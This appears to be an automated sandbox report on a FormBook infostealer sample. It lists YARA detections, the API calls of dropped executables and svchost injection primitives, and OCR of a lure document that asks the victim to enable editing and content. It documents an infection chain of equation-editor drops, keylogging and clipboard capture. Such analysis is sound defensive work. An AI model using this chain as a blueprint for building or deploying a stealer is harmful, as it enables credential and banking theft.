          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 19 h . yellow bar above ,0 This document is 3. Once you have enabled ed
          Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 22 23 24 25 26 27 28 0 29 . 30 31 32 33 34 3
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004181D0 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00418280 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00418300 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004182FA NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00418284 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE10D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE0060 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE01D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE1148 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDF8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDF938 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE1930 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFB50 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE0C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE1D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004181D0 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00418280 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00418300 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004182FA NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00418284 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004183AB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008510D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00850048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00850060 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00850078 NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008501D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00851148 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00851930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00850C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00851D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000981D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00098280 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00098300 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000983B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00098284 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000982FA NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000983AB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0078632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007867C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00786332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007867C2 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C342D5: CreateFileW,DeviceIoControl,CloseHandle,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00406925
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C4E37C
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C3133F
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C3F24C
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C5322F
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CC01DD
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2D15B
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C5113B
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C467DB
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C27753
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C22705
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CC1638
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C3945A
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CA5B9A
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2CBBC
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2EAC1
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C24A80
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CC2A22
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C3C9F0
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C31889
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CADFDA
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C1FFD7
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CCCFA4
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C47F00
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CD3E83
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C36DFE
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CC0D8E
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C22DB2
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CA5D55
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CBFCEE
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2CC5C
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C42C6D
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BF33B7
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BD1663
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BF23F5
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C58400
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C06502
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BDE6F0
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C0265E
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BF282A
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2391F
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B871
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041CBC6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041BBDB
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041C3A2
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041BC4D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00408C6B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00408C70
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00408C2A
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041BCF3
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B4B6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041BD21
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00402D89
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041C7FE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEE0C6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C0905A
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C1D005
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF3040
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEE2E9
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C91238
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C163DB
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEF3CF
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C963BF
